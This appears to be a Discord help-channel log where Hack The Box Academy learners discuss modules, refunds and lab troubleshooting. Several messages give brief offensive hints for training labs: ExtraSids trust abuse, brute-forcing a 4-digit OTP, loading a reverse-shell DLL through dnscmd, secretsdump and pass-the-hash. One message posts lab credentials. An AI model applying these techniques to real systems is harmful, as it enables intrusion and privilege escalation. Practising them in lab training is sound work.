got the flag now. thanks for the help

You just need to get lucky

anyone that can help me on the last question on Skills Assessment for the module Intro to C2 Operations with Sliver???
im a bit stuck

i suggest reviewing the Active Directory Enumeration & Attacks module, specifically ||the sections on Domain Trusts- Childs -> Parent trusts . ExtraSids should do the trick ;)||

thats true. but also some stuff dont work/breaks but i will take a break

quick question, i'm still learning about cybersec on htb, when should i know when im ready to try my first machine?

I need help
I just accidentally bought gold annual subscription (1260 usd) on htb academy. I already had student monthly subscription and i was just exploring different plans. As i clicked on the purchase option it automatically subscribed to it and 1260 usd were deducted from my account.
How do i get a refund?? And will i even get a refund back?

just do them

only support can help you out dude

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

green bubble on academy; bottom right

if you don't see it --disable adblock

I contacted that green bubble and got a reply saying to wait up until monday. I mean would i even get a refund?

just be patient then

they're generally lenient

they do have support over the weekend but it's at a lower capacity; it's currently ~12AM where HQ is located so likely the main crew that works weekend shift is offline

ntm it's the weekend, any refund would have to wait for next businessday at earliest in most cases

I think their billing support is Mon-Fri no weekends

Alright, i am really nervous i hope i get a refund coz thats my 1 year savings in the country where i live

yeah, but nothing can be done on the discord for you

Yh i was just looking if anyone else had experienced a similar situation

support doesn't monitor the discord, and they'd request you to open a ticket on the platform anyway

i've heard people in similar situations get refunded

Oh thats great then

#1024429874246590575 you can see other people have asked the same

and of those people have confirmed issue resolved

@terse zinc DM me your Academy ID / email address

@ocean night sure

@ocean night check your dm

I've provided you with a full refund. Please update the support ticket you raised to ensure they are aware this has already been actioned. It can take up to 2-5 working days for the refund to be received.

Sure, thank you so much

👍

i need some help so i had a acc from 2021 i dont remember the email any more

i try discord support but they didnt do anything they said we cant give anything out. i think i know the email but i am not sure

A hackthebox account? If it's a discord account HackTheBox can't assist you with that and no we won't be hacking your old account if that was your intent

unfortunately we can't help with that. you will have to ask support or find your email

if it's an HTB account, i would ask HTB support

https://tenor.com/view/good-luck-with-that-anthony-mennella-culter35-good-luck-best-of-luck-gif-20143678

Anyone available ? got a question concerning zone transfers in INFORMATION GATHERING - WEB EDITION

https://dontasktoask.com

well the question is After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

I spawned the target ip added it to /etc/hosts and ran
dig @spawned-ip inlanefreight.htb AXFR

didn't return anything

;; Connection to 10.129.42.195#53(10.129.42.195) for inlanefreight.htb failed: timed out. ;; no servers could be reached

im probably doing something wrong but i couldn't figure out what

does anyone know if i need a external wifi adapter to switch my kali to wlan0 instead of eth0?

or is there anyway to do this without needing to buy a wifi adapater im using virtualbox vm

if you're using it, say for airmon-ng for example yes u need an external adapter vbox can't access hardware directly so u won't be able to start monitor mode for example

ahhhh okay thanku fml

which vm do u use to be able to do it without external adapter? if u do use one

i don't hink it's possible if u're running a virtual machine

damnn okay

whether u are on vbox vmware ect u do need an adapter

got it thanks

appreciate the help

anytime, glad I could be of help

are you connected to the vpn?

please keep questions related to HTB academy

my bad, do you know if theres a channel for general help?

#community-content or perhaps #homelab-sysadm depending on the question but it helps to provide as much info about your situation instead of trying to solve a problem that might not need solving

Hi Guys! I need some help. I have made hyperlinks on a word doc to modules from HTB academy that the students can click on and access it, but when I click them they redirect me to my dashboard instead of the module. How to fix this? Thanks

can you give an example URL that you are using for the hyperlinks?

https://academy.hackthebox.com/module/details/15

This is the one I am using for intro to academy

that link is the module overview, you'll need the link from within the section

https://academy.hackthebox.com/module/15/section/32

So in address bar I simply replace it with this https://academy.hackthebox.com/module/15/section/32?

not to mention if you're not set to remain signed in or some funky stuff goes on with the SSO it redirects to dashboard

yes, it's always redirecting to dashboard no matter what I do

that's just the nature of how it's going to work

damn

links like these don't as long as you're signed in

I tried with logged in account and as well logged out account, same results

redirects me to dashboard

works for me

Have you tested it out with the hyperlink on word doc?

yes

maybe I am doing something wrong

can you guide me with some steps would really appreciate it

I just link it, that's it

@novel parrot https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162/4

thank you

it works the same clicking it from here and elsewhere

I am already signed it and still takes me to dashboard even after using https://academy.hackthebox.com/module/15/section/32

out of curiosity, are you logging in with Academy account or HTB account

academy account

not SSO?

have you unlocked the module?

yes, it's unlocked

I can access it via browser but hyperlink redirects me to dashboard for some reason

are you doing the CPTS path? why aren't you enrolled in it so it's on your dashboard?

works with sso too

i mean worst case scenario fire up something like burpsuite or zap to intercept the packets to see why it redirects

Basically, I am just trying to make hyperlinks for students to click on for ease of access. If they will click my hyperlink I don't know what will happen. Will it take them to dashboard or to the module straight?

If it's not working for me then there's a possibility that it might not work for them as well.

I'm sure your students will be able to navigate the website with the title even without a direct link

yeah

there's also a search all modules page

if they're also subbed/enrolled in the CPTS path (if that's what you're following) then you don't really need to have them click anything

it'll literally be on their dashboard

though using HTB as your curriculum seems kinda odd to me ¯_(ツ)_/¯

(unless it's an afterschool program)

agreed. I've taught before, and while it was an unrelated field, I wouldn't structure my syllabus that way. also, have a look at all those modules. thats a lot for 1 week ....

Yeah if you're basing it off the estimated time, you're gonna run into some troubles and struggles

agreed. particularly if you are doing it all for the first time. if its a quick re-fresh then maybe it'd be ok. but still ... lol. context would be helpful though haha

Module - API Attacks

Section - Broken Authentication

I have brute forced pass as well as OTP , but nothing get in returns
hint is saying to focus on reset password

what am I missing ?

anybody help here>

Hey guyz got a serious duacussion wanna join

no thanks

Please sirously need a help i am learning about it

we're already here to discuss academy so no i don't want to join another one

This channel is intended for academy module questions, let's keep it for it's purpose pls

Lets discuss here

No

this channel is for discussion about HTB Academy modules. verify your account in #welcome and find a relevant channel for your discussion

Thx for help calculac0re

Just wanna know i want an best hacker community where i can communicate advanced ethical hackers ?

this discord is about the hackthebox platform. discussions here are related to the website and services there.

I asked for an better community

/rank

this is about HTB, if you feel like you need a different community, I advise you to search for it on the Discord directory or Google

if you want education then you've reached the right place

I just wanna communicate advanced ethical hackers to learn more

Where ?

search for a group masterhackers

Where

they don't reveal their location but i suspect it's close to the gibson

Please use the appropriate search funnctions

I have stuck here
If anyone can help.

yup, It worked thanks all i had to do was reset the target ip

Hey there!! Looking for some good resources and road map to learn finding SQL injection vulnerabilities.

sql fundamentals module

Finished!!!

Advanced sql injection

Anthing out of hackthebox modules??

yeah there's a few of them

Portswigger academy

👍

may be a dumb question but why does 0.0.0.0 point to localhost

because 0.0.0.0 points to all possible IP's

It's a wildcard

You can't technically go to 0.0.0.0 it'll just send you to the closest interface that's hosting that port (or localhost)

so if i dont host anything on localhost, it will go to a random ip?

No

It won't go outside local

it seems to point exactly to 127.0.0.1

https://en.m.wikipedia.org/wiki/0.0.0.0

it is used when you are listening for an incoming connection from any IP address

but if you know the IP, you could set it. In real world it would be safer to not listen on any incoming address

It technically can be localhost but you can't actually use it as localhost

i guess in linux it is same as localhost

Technically but no. It's complicated

no, let say you host a http server, you can't get it by going to 0.0.0.0. I don't think so, i ll try

https://www.techtarget.com/searchnetworking/answer/What-is-the-IP-address-0000-used-for

you sure can

ah yeah you can get it from 0.0.0.0 as it points to localhost

yea thats what am asking why

if i send request to 0.0.0.0 what makes it to send to 127.0.0.1

that's what i am asking myself, it is not in /etc/hosts

the source of ip is also 127.0.0.1

My suggestion: stop worrying about it

As you'll never need to care about it

there is more explanation in there https://superuser.com/questions/949428/whats-the-difference-between-127-0-0-1-and-0-0-0-0

its always good idea to dig deep to unlock more knowledge

It's a special reserved address that serves a different function to loopback

but it doesnt act so when used by client

sigh

Either way it doesn't belong in this channel

got this doubt from ssrf section in modern web techniques

Well you didn't preface that did you

But either way, you wouldn't use 0.0.0.0

Even though if looks like it's doing the same thing, it's not

And it's honestly not worth spending time and effort digging into

Yes I know bruv... been using the wrong wordlist....

Anyone help here.

bruteforce otp

1000-9999

Okay

HI! I am doing the Getting started module. Nevertheless, I am presented at some point with some boxes. I don't know if I should do them, or they are just a heads-up of what's coming next

For example, they mention there 'Nibbles', but that box is part of the Getting Started module.

So I don't know if I should do them on my own, or they will be included in next modules

you're not expected to do them now.

you'll come across nibbles and blue during some modules

i only recently did some boxes when i got to 75% of the CPTS pathway, and still needed some nudges here and there. so don't worry about boxes yet, unless you're already confident. you can always try them, and then stop when you're stuck.

Got it, ok, thanks a lot!

Thanks it worked

btw checkout burpsuite turbo intruder, it can bruteforce this in few seconds

Just tried resetting the lab, but having issues brute forcing FTP.. what could cause this?

well, the error says it's not an ftp protocol

what is this process listening on port 53

prob dns?

i want to bind a dns to port 53 but this causes address in use

But nmap is saying something else

you'd be better off asking for help on the question

like which module/section/question are you stuck on

you may be doing something totally wrong but we have no context

#modules message
#modules message

Tbf I don't see what else it could be other than ftp

uhh he asks you to mention the module and section lol not the channel

eeee how to kill this, it has no pid

Ooh
Thanks

Why don't you just bind to another port?

i need to host a fake dns

Try without port :21 in the IP, and try default task: remove -t48. Until you have a working command, it is not useful to up the speed.

So like this? I believe Hydra is adding :21 to the ip since it is FTP

nvm i will just use pwnbox 😥

I believe hydra knows what the default ftp port is. You can keep ftp:// or the other way. Both works I think. Edit: yeah sorry your command was right in the first place I was reading the wrong line

No problem, appreciate your effort :-)

i cant use pwnbox and vpn at same time?

I guess it is just the very verbose output that throws errors we would not see otherwise. And maybe the -t48 is too much. Default is 16 so… and last thing I’m not sure I retrieve the password via ftp iirc.

after granting admin access still cant change permission of file

in DNS admin section, tried evilrm pth but not authorized

did you add yourself to Administrators group?

^

yes

try to restart the machine with shutdown /r @clever topaz

well, it says failed granting, maybe try to run pws as administrator?

group changes in windows only apply after restart i guess

tried

im pretty sure restart will work

i don't recall ever having to use icacls in htb so you're probably not going about something the right way

window escalation, dnsadmin section

ok then try to get a reverse shell

i got admin hash but pth way is not possible

why not a rev shell

lemme try

show me net group "Domain Admins" /dom

yep i checked my notes, i have used revshell aswell

i am able to do so

but domain admin doesnt mean u can read the flag right

thats why i tried to use secretsdump to get hash for pth attack but cant

domain admin can do whatever it wants

i tried jn with domain admin but still access denied

what are the results of the command

the group changes only apply after restart

so its better to get revshell

access denied

then something is seriously wrong with the instance if you can't even run the net command

bro i cant do type function not net function.... i cant cat the flag.txt

ok well when you want help answer my question, but i'm going to bed soon

i literally said, i added into both local admin and domain admin but still cant change the ownership of the file to read, as vigneswara said, maybe it take effect only on restart

why ask for help if you don't take it

the results of the command i told you to show are absolutely critical

wdym.... u just ask me to do net group "Domain Admins" /dom?

and yes the result is netadm is added into the group

create a revshell dll

and load it with dnscmd

ok thanks

if you added yourself to domain admins, you can read the flag. you refuse to show the screenshot of the command so i'm guessing you didn't actually add yourself.

lmao

imagine how i add myself into local admin

because i can only load one dll once only, if i load second time it will show error

i lazy to respawn machine just to show ur screenshot, just be nice thanks

it's taking you over 15 mins to type net group "Domain Admins" /dom and show a screenshot bruh

imagine if example show us to add into domain admin but i add netadm into localadmin, its because ive tried domain admin and it doesnt work

not here to fight so bye

yeah and that isn't going to work

you need to be domain admin

Hello

i can only load one dll per machine spawn idk why

solved

sorry for again asking
can you give a nudge on section : Unrestricted Resource Consumption

hint is saying to Focus on the POST /api/v1/authentication/customers/passwords/resets/sms-otps endpoint.

But I cannot send otp to a customer as I have loginned as supplier

i was able to access that endpoint

maybe you need to login with a different credential?

I can also access but the question is Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.

don't know what to do

sms opt is the right endpoint

you means sending too many request?

yea

what did you do

yeah its worked

its another level of thing
never imagined that

thank you bro

I recommend that you read through the module again. This method is explained in it.

module or only related section ?

well its not a common place to give the flag

To be honest, I don't know it off by heart.

I have read that it could lead to Dos attack

so straight forward exercises

just given one point
But No practical example is given

After API attack?

im just going randomly

i didnt finish API Atacks btw only upto that one

Rank 4 in the OWASP API Top 10

https://owasp.org/API-Security/editions/2023/en/0xa4-unrestricted-resource-consumption/

i mean no one would expect dos to give flag ( if not specified in context )

There are vulnerable APIs for training. They also offer such vulnerabilities
I was not surprised to find it here

yeah bcoz there were some given points to not use dos attack on any htb machine
they are just warning about it
but here we can now experience it😄

Every bruteforce attack generates more traffic than this task 😉

For example, in the previous task you send over 10000 requests. For this task, approx. 20 requests are sufficient

this section recommends to use clamAV antivirus
is it better then mcAfee or total security

like brute forcing is another type of dos attack 😄

The question is always, what for? For a server? A client?

for a normal PC user

Run new evil winrm session

Because rev shell doesn’t spawn shell

Windows? MacOS? Linux?
Do you want to install software on your PC that requires very extensive system rights?
There are reasons that speak for it and there are reasons that speak against it.

its a windows 11

I just want to know which one can effectively scan virus?

windows defender ftw

just dont download any programs that windows defender blocks

yeah
I was just comparing virus scanning effect of these antiviruses

I personally only use Windows Defender

sure it is

Hey im going through cpts modules and in the active directory section the Dc sync part im trying to solve the lab but i cant seem to solve it im stuck i rdp into windows and from there i try to do the secretsdump and all nothing seems to work

what section

and module

Dc sync module from active directory section

run secretsdump from attacker machine

I cant ssh into the atacker machind from the windows machine im rdp'd into currently

why you cant ssh

can you show ss of error message

I use the creds given to ssh into 172.16.5.225 at the above

But cant ssh into it

what credentials did you use

username is htb-student

Yes and password Htb_@cadmey

That one

i think the password is Academy_Studrnt something

That is for the rdp windows machine

To ssh into linux one its a different password

i dont remember but in my notes i have screenshot of logging in to ssh

HTB_@cademy_stdnt!

these are spoilers

delete them please

oh okay

Its already given in the module the password and all

you should be able to ssh then

Nop

you could also use mimikatz.exe but i dont understand why you cant ssh

ClamAV is used to scan attachments on the fly and provides a deamon that runs in the background

Enterprises, especially Email providers, use it scan attachments in emails

If your API deals with file uploads, then using ClamAV will help you determine whether its malicious or not

Mmm

Plus the deamon can fetch the updated database from Cisco any time using incremental updates

Me too im stucket here for a day

the password works

instead of just saying it doesn't work why don't you provide some error messages that you ran into

I typed ssh htb-student@172. 16.5.225

And enterd both Htb_@cademy one and Academy student one

that's not the right ip you should ssh into

Passwords to try both failed

it's not even in the same subnet as your own machine

I tired 10.129. One also

Initialy i tried with that and didn work

for the targets you're given 2 ips, ACADEMY-EA-ATTACK01 is the attack host

Thats why i tried using this also as it was mentioned in the module

I just tested it and it workshtb-student:HTB_@cademy_stdnt!

I tried

But not working

you probably typed the user or password wrong then

can you show a screenshot

No permisin to share images

dm it then

have you verified if copy pasting works properly

i tried to edit the resolv.conf file for mentioning dns server for my lxc container but if i tried to change it , it revealing my host information like shown in the screenshot. its wierd, any info regarding this guys like why is it showing like this and how can i prevent it ?

this is from the lxc container, its revealing my host system info